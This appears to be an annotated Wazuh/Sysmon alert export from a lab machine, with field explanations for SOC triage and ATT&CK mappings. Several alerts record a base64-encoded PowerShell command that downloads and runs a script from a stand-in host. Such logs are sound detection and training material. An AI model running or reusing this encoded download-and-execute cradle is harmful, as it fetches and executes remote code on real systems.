How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535356.2740888
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:54.0942354Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350473
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:52.709 ProcessGuid: {94294ddc-c178-680a-e60c-000000000e00} ProcessId: 12424 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c172-680a-e30c-000000000e00} ParentProcessId: 8356 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:52.709
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c178-680a-e60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12424
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c172-680a-e30c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:56.879+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:56.879+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  124
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535356.2748955
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:55.0268034Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350477
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:54.983 ProcessGuid: {94294ddc-c178-680a-e60c-000000000e00} ProcessId: 12424 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mciyuvr4.sxa.ps1 CreationUtcTime: 2025-04-24 22:55:54.983 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:54.983
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c178-680a-e60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12424
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mciyuvr4.sxa.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:54.983
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:02.672+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:02.672+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  121
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535362.2751724
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:00.0931226Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350561
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:58.970 ProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00} ProcessId: 17020 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c178-680a-e60c-000000000e00} ParentProcessId: 12424 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:58.970
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c17e-680a-e90c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c178-680a-e60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12424
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:02.682+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:02.682+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  125
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535362.2759795
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:00.3687114Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350564
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:00.355 ProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00} ProcessId: 17020 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vzf12wvk.xny.ps1 CreationUtcTime: 2025-04-24 22:56:00.355 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:00.355
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c17e-680a-e90c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vzf12wvk.xny.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:00.355
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:05.168+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:05.168+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  122
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
